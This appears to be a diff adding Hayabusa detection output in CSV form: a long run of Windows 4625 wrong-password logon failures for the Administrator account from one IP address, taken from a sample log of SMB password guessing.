+2016-09-20 01:52:29.121 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HMKnLRQCDn1CHZdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ShGnRYHfVSuPvfcX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LXVWG3Yl0utv98Zf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VDfa0UebgleQMK5U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.321 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BxTLJJsWs9dOc5JC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.372 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7cKtymmsQJSM6zZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbtC0srNyvkIHOSV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wPGlJ6ZjGSfUKrCf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Uw95Ema8vWlRXKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hHTrBmhkjGLTNt2R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.574 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XJeRVGKULJIo76aa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kipf0Z2Tse2eWoxa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bnP7tmMJXDVzIDim | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CBeMt62oqlIICShT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dIfXRZQkKRJAw4er | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wrqSJPALo5QtUnS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:29.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81Mm67AdwpPJMCMm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Jwq5jXlMRU1SNLO5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d7OYj8ynCEl5dG9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.127 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YzT8vF7ANYnjSRgd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m4eYIoww4uL6oYZu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.199 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DpO8L2Fky4zYwp2q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGmxSy48sphENTiY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.285 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tQVAkjteLFK0hbyE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMWKsQ8l0j9fZPfA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2ct7xYUYH9sr7mva | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.423 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBn0XxaPOZQokJ0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.463 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nQELRxrGuXqkYgO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.509 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5eT0mykgLNZQygq9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qMyIqRidF6oBdzog | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ULnnFcF98k9zpNTl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j5k02pcelZNGwF3u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qfcC6LqJqs0EeGjE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXALYkkitmyAFq14 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIqQmExq22WrW4md | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ydHqjdZhLMI9gjfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.865 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSe45VZNPdovPbq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.910 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hiHlcR6qNGE0P7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iT3jPdHr89RqPlyd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:30.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0QFnABeYK39XEntR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5plMYSBQi5mKmdlk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.113 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TaxWckQUCMgWvCZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 81xZ7iisEyTABmUm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.187 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qYiQ2xjMQFQwH2XY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eRN8e3yzZzxc2p3A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QCa6PN0C7XznvipG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.311 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hFqjIXbEb7eWUFUi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkrVjLgnJZlIyXpk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2r5tyuIYijAXN5be | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AgjQNe9hQrLIETDn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNoInpFTsixZDIu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ladJUS6I0HMIwdef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6oW63pJlVtjgn3YY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xKNu8b2To2Y1twUr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9sN5xm3GytfmM7G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtQQS61GYBm6WUUz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WxxawZZMhNCGHxc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sKP8G2VgJlrr9LMR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvOsNQpk3c5p1FgK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.839 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H7oz7NPh5Z8UrDPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvzNFOLBlBv98Do4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KJmYytO30Icc6Rb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zro3jLjFXWZ2o8VL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Z2J8VYeuxd9fKcG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXMjOKLfMex7OmMv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgbm3YeoGxCa22Il | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7MEstBFjiWhVE18 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8Y2kDEiMZWf0znn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBAFVgPIOyCvtdRs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s3pFhUcspF6lzQXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39LFXXW715pQoADC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: in4ewyxouUnxQzCQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zOtV8CLIU6Mcw2ty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8NJqimhGrg9uhTh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
